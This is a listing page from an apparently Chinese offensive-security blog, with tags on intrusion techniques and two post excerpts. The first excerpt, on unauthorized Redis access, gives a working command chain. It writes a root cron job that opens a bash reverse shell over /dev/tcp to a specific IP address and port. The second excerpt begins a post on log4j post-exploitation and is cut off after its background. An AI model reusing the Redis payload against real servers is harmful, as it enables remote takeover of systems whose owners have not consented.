EvilSwan 关注信息安全

所有标签

#汇编 ¹ #Mythic #Mythic ¹ #CobaltStrike ¹ #隧道搭建 ¹ #横向移动 ¹ #权限提升 ¹ #痕迹清理 ¹ #信息收集 ¹ #内网渗透 ² #RAAS ¹ #勒索组织 ¹ #exploit #ActiveDirectory ² #学习计划 ¹ #post-exploit ² #log4j ¹ #Halo ⁰

Post-Exploit #post-exploit

Redis unauthorized post exploit

cron set 4a "\n\n*/1 * * * * bash -i >& /dev/tcp/120.79.51.115/91 0>&1\n" config set dir /var/spool/cron/ config set dbfilename root save webshell #

Administrator 发布于 2024-12-06

Post-Exploit #log4j #post-exploit

log4j任意命令执行漏洞的后利用

作为一个2年多前的漏洞，慢慢也开始替代shiro反序列化漏洞出现在各个攻防的场景，就该漏洞的后利用作出描述。漏洞原理 JNDI 全称为：Java Naming and Directory Interface ,java命名和目录接口，刚开始我也始终不理解这个功能的含义，后面发现不必太过纠结于此，更

Administrator 发布于 2024-07-07